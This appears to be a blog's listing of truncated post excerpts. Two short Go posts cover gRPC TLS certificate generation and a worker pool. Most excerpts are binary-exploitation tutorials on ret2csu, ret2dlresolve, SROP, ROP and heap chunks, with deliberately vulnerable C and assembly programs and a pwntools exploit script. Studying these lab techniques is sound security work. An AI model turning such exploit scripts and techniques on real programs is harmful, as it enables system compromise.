Go client-server pattern: grpc

What is grpc? grpc is a Remote Procedure Call (RPC) framework developed by Google.

Generating a TLS certificate

Generate the CA (Certificate Authority) private key and self-signed certificate:

openssl req -x509 -newkey rsa:4096 -nodes -days 3650 -keyout ca-key.pem -out ca-cert.pem -subj "/C=TR/ST=ASIA/L=ISTANBUL/O=DEV/OU=TUTORIAL/CN=*.hack.com/emailAddress=hack@foxmail.com"

Script output:

winsun@unbuntu64:~/test/grpc-tls-go/cert$ ./generator.sh
[1] 删除所有pem文件
[2] 生成ca私钥和自签名证书
....+.....+....+..+.+...+..+.............+.........
...................................................
-----
winsun@unbuntu64:~/test/grpc-tls-go/cert$ ll
total 20
drwxrwxr-x 2 winsun winsun……


Go worker pool pattern

Worker pool

Define the job and the channel:

type WorkerJob struct {
    from      int
    size      int
    isConcept bool
}

jobCh := make(chan WorkerJob, 100)

Define the producer. The producer creates jobs and sends them into the job channel:

func producer(jobs chan WorkerJob) {
    job := WorkerJob{from: 1, size: 10}
    jobs <- job
}

Create the worker pool:

func worker(jobs chan WorkerJob, results chan WorkerResult, wg *sync.WaitGroup) {
    for job := range jobs {
        out := WorkerResult{jobId: job.id, message: cosumer(job.from, job.size, job.isConcept)}
        results <- out
    }
    wg.Done()
}

func createWorkPool(numOfWorkers int, jobs chan WorkerJob, results chan WorkerResult) {
    var wg sync.WaitGroup
    for i := 0; i < numOfWorkers; i++ {
        wg.Add(1)
        go worker(jobs, results, &wg)
    }
    wg.Wait()
    close(results)
}

Define the consumer:

func cosumer(from, size int, isConcept bool) string {
    // to do...
    return "success"……


ret2csu

Vulnerable program:

#include <stdio.h>

int win(int x, int y, int z) {
    if(z == 0xdeadbeefcafed00d) {
        puts("Awesome work!");
    }
}

int main() {
    puts("Come on then, ret2csu me");
    char input[30];
    gets(input);
    return 0;
}

Exploitation analysis

Conventional exploitation: the overflow controls rip so that it points to a gadget, and the gadget executes win.

Exploit code:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()
log.info(f'win addr is : {hex(elf.sym.win)}')
offset = 40
rop = ROP(elf)
rop.raw(offset * 'a')
rop.win(0, 0, 0xdeadbeefcafed00d)
p.recv()
p.sendline(rop.chain())
result = p.recvline()
log.info(result)

The code above assumes that suitable gadgets exist to build the chain, but in practice……


ret2dlresolve

Overview

With ret2dlresolve, an attacker can induce the binary to resolve a chosen function (such as system) into the PLT. Dynamically linked ELF objects import libc functions on first use through the PLT and GOT. When a runtime symbol is relocated, RIP jumps into the PLT and attempts to resolve that symbol. During this process, a "……


socket exploitation

socket vuln

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void vuln(int childfd) {
    char buffer[30];
    read(childfd, buffer, 500);
    write(childfd, "Thanks!", 8);
}

void win() {
    system("/bin/sh");
}

////////////////////// Socket Stuff

/*
 * error - wrapper for perror
 */
void error(char *msg) {
    perror(msg);
    exit(1);
}

int main(int argc, char **argv) {
    int parentfd;                  /* parent socket */
    int childfd;                   /* child socket */
    int portno;                    /* port to listen on */
    int clientlen;                 /* byte size of client's address */
    struct sockaddr_in serveraddr; /* server's addr */
    struct sockaddr_in clientaddr; /* client addr */
    struct hostent *hostp;         /* client host info */
    char *hostaddrp;               /* dotted decimal host addr string */
    int optval;                    /* flag value for setsockopt */
    int n;                         /* message byte size */

    /*
     * check……


SROP

SROP

Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. See [1] for details.

Vulnerable program

The vuln program:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
    '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx, 500;
    syscall;
    ret;
    pop rax;
    ret;
    ''',
    vma=0x41000
)
elf.save('vuln')

└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17

Embed the shell address:

┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln
┌──(k……


ROP

ROP

Return-oriented Programming defeats the W⊕X protections recently deployed by Microsoft, Intel, and AMD; in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general.

gadget

What is a gadget? Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task.

"W⊕X" ensures that no memory location in a process image is marked both writable ("W") and executable ("X").

Gadget features: one gadget might perform a load operation, another an xor, and another a conditional branch.

Example program:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
    '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx,……


heap: chunks and bins

chunks

On x86_64 a chunk carries 16 extra bytes of metadata; on x86 it carries 8 extra bytes of metadata.

metadata := prev size + size + flags(A,M,P)

prev size: if the preceding adjacent chunk has been freed, this field holds the size of that previous chunk.
size: the size of this chunk.
P (0x01): Previous in Use, indicates whether the preceding chunk is allocated and in use; when P == 0, the chunk before this chunk……
